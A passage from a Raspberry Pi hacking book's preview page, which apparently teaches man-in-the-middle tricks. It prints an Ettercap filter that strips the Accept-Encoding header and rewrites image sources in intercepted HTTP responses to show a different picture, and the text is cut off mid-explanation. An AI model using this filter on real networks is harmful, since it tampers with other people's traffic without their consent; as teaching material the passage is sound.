Pushing unexpected images to browser windows

Not only do man-in-the-middle attacks allow us to spy on the traffic as it passes by, we also have the option of modifying the packets before we pass them on to their rightful owner. To manipulate packet contents with Ettercap, we will first need to build some filter code in nano:

pi@raspberrypi ~ $ nano myfilter.ecf

The following is our filter code:

if (ip.proto == TCP && tcp.dst == 80) { 
  if (search(DATA.data, "Accept-Encoding")) { 
    replace("Accept-Encoding", "Accept-Mischief"); 
  } 
} 
 
if (ip.proto == TCP && tcp.src == 80) { 
  if (search(DATA.data, "<img")) { 
    replace("src=", "src="http://files.raspiplace.com/agentpi/tux.png" alt="); 
    msg("Mischief Managed!\n"); 
  } 
}

The first block looks for any TCP packets ...

Get Raspberry Pi for Secret Agents - Third Edition now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.

Start your free trial

Raspberry Pi for Secret Agents - Third Edition by Matthew Poole

Pushing unexpected images to browser windows

Don’t leave empty-handed

It’s yours, free.

Check it out now on O’Reilly